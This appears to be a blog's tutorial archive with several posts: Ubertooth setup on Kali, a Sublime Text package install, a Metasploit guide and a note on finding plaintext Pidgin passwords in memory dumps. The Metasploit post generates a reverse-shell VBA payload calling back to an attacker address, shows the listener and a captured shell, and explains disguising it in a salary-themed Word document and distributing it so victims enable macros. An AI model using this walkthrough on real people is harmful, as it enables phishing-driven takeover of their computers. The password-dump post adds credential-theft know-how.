Category Archives: Tutorial

Setting up Ubertooth One – Kali

Install essential packages and updates
Login to Kali as root/toor
apt-get update
apt-get install kali-linux-sdr
apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev pkg-config libpcap-dev python-numpy python-pyside python-qt4 libgtk2.0-dev libusb-dev bluez

Install the Bluetooth baseband decoding library
wget https://github.com/greatscottgadgets/libbtbb/archive/2015-10-R1.tar.gz -O libbtbb-2015-10-R1.tar.gz
tar xf libbtbb-2015-10-R1.tar.gz
cd libbtbb-2015-10-R1
mkdir build
cd build
cmake ..
make
make install
ldconfig

Continue reading

Facebooktwitterredditpinterestlinkedinmailby feather

Syntax highlight support for NASM x86 Assembly code in Sublime Text 3

Open Sublime Text 3 console using shortcut: ctrl+` and then paste the below code following by Enter:

import urllib.request,os,hashlib; h = 'eb2297e1a458f27d836c04bb0cbaf282' + 'd0e7a3098092775ccb37ca9d6b2e4b7d'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by)

See also code in Sublime Text Console window:
sublime.a

Then tap Shift+Cmd+p and type “package control: install package”, select and press the Enter key:
sublime.b

in the textarea type in “NASM x86 Assembly” select the first (and one) from list result to add the package:
sublime.c

Last, open your assembly file and Sublime Text 3 menu, select View | Syntax | Assembly (x86) NASM and enjoy the colored syntax.

Facebooktwitterredditpinterestlinkedinmailby feather

The MS Office, a Macro and a Shell

In this post we will go through the steps to create a VBA (Visual Basic for Applications) payload using Metasploit Framework and stick that into a Microsoft Office Word 2003 document. When the target users open up the document we will get a command line prompt. The process is divided in four parts.

Part1 – Payload generation
./msfpayload windows/shell_reverse_tcp LPORT=5000 LHOST=192.168.1.108 V> /var/www/win.sh_rev_tcp.1.108-5000.txt

Part2 – Attacker’s end-point preparation
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 5000
LPORT => 5000
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…

[pentester waits here for victim to eat the bait…once file is opened a shell is spawned as follows]

[*] Command shell session 1 opened (192.168.1.108:5000 -> 192.168.1.106:1040)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>systeminfo
systeminfo

Host Name: WINXP
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation


C:\Documents and Settings\Administrator>


Part3 – Wrap bait into Office Word document
a. First, we need to copy the contents of file win.sh_rev_tcp.1.108-5000.txt, generated in Part1 over to our Windows machine. Having a web server at the Linux site is always handly, we just opening up Firefox and pointing to http://192.168.1.108/win.sh_rev_tcp.1.108-5000.txt
b. Now, create a new MS Office Word 2003 document, named it StaffSalaries2009.doc.
c. Open the new document, go to Tools | Macro | Visual Basic Editor
d. On the left hand side, double click on the ThisDocument icon, the area where you should paste the code will popup in the middle of the screen
e. Paste the code from win.sh_rev_tcp.1.108-5000.txt
f. Save the script into the document by clicking the Save icon at the toolbar, do File | Close and Return to Microsoft Word
g. Add some data to your fishie document so to look genuine, Save and Exit
h. Distribute the document and hold back

* The above also apply for Office Excel documents, however please note that the generated Visual Basic code should be saved into ThisWorkbook item instead of ThisDocument, as per instruction d.

Part4 – Distribution etc
Having done all these, you can send the file as an attachment or save to a shared area where your victims can spot it and fire it up, if their Macro Security (Tools | Macro | Security… ) level is set to low your goal will be achieved instantly. In any other case the users will get a friendly message telling them “The macros in this project are disabled. Please refer to the online help or documentation of the host application to determine how to enable macros.” with an OK and Help button, pressing the Help button tells them exactly where to click so to enable macros.

Facebooktwitterredditpinterestlinkedinmailby feather

IM Memory Dumping (cont.)

(You may want to read first IM Memory Dumping)

According to Wikipedia on April 6th 2007, GAIM’s project development team changed the name of the popular IM to Pidgin, as a result of their settlement with AOL and latter’s trademarked acronym AIM. So we downloaded Pidgin’s latest version 2.5.5 and installed it in our VMware Windows box. We happily added our demo username and password (for our test it does not matter if you tick the box saying remember password, or not, as there is no change in the result of our experiment). Then we dumped Pidgin’s process memory, saved it to a file in our Samba share, the file consumed about 50MB of space. From there, using the strings command we searched for sequences of printable characters; by grep-ing for our set password we found three instances of it in different places (all of them of course in plaintext).

We changed our account password a few times and repeated the process again and again, last we concluded that:
1. every time the password was stored three times in the process memory
2. one of the locations is very easily spotted in the dump (if you view the file with a Hex editor you will see that there is always a large block of random data then the string =p&=, then some random numbers (which they do not always appear) and finally our password). As you understand even if you do not know the secret password you can find it by trial and error in just a few tries.

I guess that other IM clients is very likely to store your passwords amongst other information in clear. I can not tell you do not use program X or program Y because they do not properly encrypt your passwords or do not scrub the memory, but I can advise you to take under serious consideration which ones you do use at home and work, and think how much exposed you are.

Facebooktwitterredditpinterestlinkedinmailby feather